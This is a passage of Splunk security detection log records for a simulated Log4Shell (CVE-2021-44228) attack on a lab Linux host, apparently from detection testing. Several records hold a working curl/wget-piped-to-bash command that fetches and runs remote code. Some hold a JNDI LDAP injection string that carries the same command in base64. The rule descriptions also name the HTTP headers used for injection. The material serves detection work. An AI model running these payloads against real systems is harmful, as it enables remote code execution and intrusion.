Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", 
annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642643916, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress 
Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638101", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:21:41", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="8018", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. 
This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642643916, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638101", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:21:41", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="8018", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", 
savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642643916, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint 
sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642643916, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl 
http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642643916, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", 
info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642643916, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", 
annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642643916, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress 
Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. 
This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642643916, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", 
savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642643654, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Actions on Objectives", annotations._all="CIS 13", annotations._all="DE.CM", annotations._all="T1190", annotations._all="CIS 12", annotations._all="Source:Endpoint", annotations._all="PR.DS", annotations._all="CVE-2021-44228", annotations._all="PR.PT", annotations._all="Command and Control", annotations._all="Stage:Initial Access", annotations._all="T1059", annotations._all="DE.AE", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", 
annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-19T22:34:59", info_max_time="+Infinity", info_min_time="0.000", latest_time="2022-01-20T00:21:41", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:110", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. Outbound LDAP traffic should not be allowed outbound through your perimeter firewall. This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space.", src_ip="0:0:0:0:0:ffff:a00:114" 1642643652, search_name="ESCU - Log4Shell JNDI Payload Injection Attempt - Rule", action="Bad Request", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 3\",\"CIS 5\",\"CIS 16\"],\"context\":[\"Source:Application Log\",\"Stage:Execution\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Reconnaissance\",\"Exploitation\"],\"mitre_attack\":[\"T1190\"],\"nist\":[\"DE.CM\"],\"observable\":[]}", annotations._all="T1190", annotations._all="Exploitation", annotations._all="CIS 16", annotations._all="Source:Application Log", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Reconnaissance", annotations._all="DE.CM", annotations._all="CIS 5", annotations._all="CVE-2021-44228", annotations._all="CIS 3", annotations._all="Stage:Execution", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 3", 
annotations.cis20="CIS 5", annotations.cis20="CIS 16", annotations.context="Source:Application Log", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Reconnaissance", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1190", annotations.nist="DE.CM", category="application/json", count="2", dest="10.0.1.21", dest_port="80", http_content_type="application/json", http_method="GET", http_referrer="unknown", http_user_agent="curl/7.79.1", info_max_time="+Infinity", info_min_time="0.000", risk_message="CVE-2021-44228 Log4Shell triggered for host 10.0.1.21", risk_object="10.0.1.21", risk_object_type="system", risk_score="15.0", savedsearch_description="CVE-2021-44228 Log4Shell payloads can be injected via various methods, but one of the most common injection vectors is via Web calls. Many of the vulnerable java web applications that are using log4j have a web component to them and are especially targets of this injection, specifically projects like Apache Struts, Flink, Druid, and Solr. The exploit is triggered by an LDAP lookup function in the log4j package, its invocation is similar to `${jndi:ldap://PAYLOAD_INJECTED}`, when executed against vulnerable web applications the invocation can be seen in various parts of web logs. Specifically it has been successfully exploited via headers like X-Forwarded-For, User-Agent, Referer, and X-Api-Version. In this detection we first limit the scope of our search to the Web Datamodel and use the `| from datamodel` function to benefit from schema accelerated searching capabilities, mainly because the second part of the detection is pretty heavy, it runs a regex across all _raw events that looks for the `${jndi:ldap://` pattern across all potential web fields available to the raw data, like http headers for example. 
If you see results for this detection, it means that there was an attempt at injection, which could be reconnaissance activity or a valid exploitation attempt, but this does not necessarily mean that the host was indeed successfully exploited.", site="localhost", src="${jndi:ldap://10.0.1.16:1389/Basic/Command/Base64/KGN1cmwgaHR0cDovLzguOC44Ljg6ODAvd3AtY29udGVudC90aGVtZXMvdHdlbnR5dGhpcnRlZW4vbTggfHwgd2dldCAtcU8gLSBodHRwOi8vOC44LjguODo4MC93cC1jb250ZW50L3RoZW1lcy90d2VudHl0aGlydGVlbi9tOCl8YmFzaA==}", url="http://10.0.1.21:80/", url_domain="10.0.1.21", user="unknown" 1642643654, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Actions on Objectives", annotations._all="CIS 13", annotations._all="DE.CM", annotations._all="T1190", annotations._all="CIS 12", annotations._all="Source:Endpoint", annotations._all="PR.DS", annotations._all="CVE-2021-44228", annotations._all="PR.PT", annotations._all="Command and Control", annotations._all="Stage:Initial Access", annotations._all="T1059", annotations._all="DE.AE", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", 
annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-19T22:34:59", info_max_time="+Infinity", info_min_time="0.000", latest_time="2022-01-20T00:21:41", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:114", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. Outbound LDAP traffic should not be allowed outbound through your perimeter firewall. This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space.", src_ip="0:0:0:0:0:ffff:a00:114" 1642643652, search_name="ESCU - Log4Shell JNDI Payload Injection Attempt - Rule", action="Bad Request", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 3\",\"CIS 5\",\"CIS 16\"],\"context\":[\"Source:Application Log\",\"Stage:Execution\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Reconnaissance\",\"Exploitation\"],\"mitre_attack\":[\"T1190\"],\"nist\":[\"DE.CM\"],\"observable\":[]}", annotations._all="T1190", annotations._all="Exploitation", annotations._all="CIS 16", annotations._all="Source:Application Log", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Reconnaissance", annotations._all="DE.CM", annotations._all="CIS 5", annotations._all="CVE-2021-44228", annotations._all="CIS 3", annotations._all="Stage:Execution", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", 
annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 3", annotations.cis20="CIS 5", annotations.cis20="CIS 16", annotations.context="Source:Application Log", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Reconnaissance", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1190", annotations.nist="DE.CM", category="application/json", count="2", dest="10.0.1.21", dest_port="80", http_content_type="application/json", http_method="GET", http_referrer="unknown", http_user_agent="curl/7.79.1", info_max_time="+Infinity", info_min_time="0.000", risk_message="CVE-2021-44228 Log4Shell triggered for host 10.0.1.21", risk_object="unknown", risk_object_type="user", risk_score="15.0", savedsearch_description="CVE-2021-44228 Log4Shell payloads can be injected via various methods, but one of the most common injection vectors is via Web calls. Many of the vulnerable java web applications that are using log4j have a web component to them and are especially targets of this injection, specifically projects like Apache Struts, Flink, Druid, and Solr. The exploit is triggered by an LDAP lookup function in the log4j package, its invocation is similar to `${jndi:ldap://PAYLOAD_INJECTED}`, when executed against vulnerable web applications the invocation can be seen in various parts of web logs. Specifically it has been successfully exploited via headers like X-Forwarded-For, User-Agent, Referer, and X-Api-Version. 
In this detection we first limit the scope of our search to the Web Datamodel and use the `| from datamodel` function to benefit from schema accelerated searching capabilities, mainly because the second part of the detection is pretty heavy, it runs a regex across all _raw events that looks for the `${jndi:ldap://` pattern across all potential web fields available to the raw data, like http headers for example. If you see results for this detection, it means that there was an attempt at injection, which could be reconnaissance activity or a valid exploitation attempt, but this does not necessarily mean that the host was indeed successfully exploited.", site="localhost", src="${jndi:ldap://10.0.1.16:1389/Basic/Command/Base64/KGN1cmwgaHR0cDovLzguOC44Ljg6ODAvd3AtY29udGVudC90aGVtZXMvdHdlbnR5dGhpcnRlZW4vbTggfHwgd2dldCAtcU8gLSBodHRwOi8vOC44LjguODo4MC93cC1jb250ZW50L3RoZW1lcy90d2VudHl0aGlydGVlbi9tOCl8YmFzaA==}", url="http://10.0.1.21:80/", url_domain="10.0.1.21", user="unknown" 1642643616, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", 
annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638231", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:23:51", parent_process_id="8018", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="8020", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642643616, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", 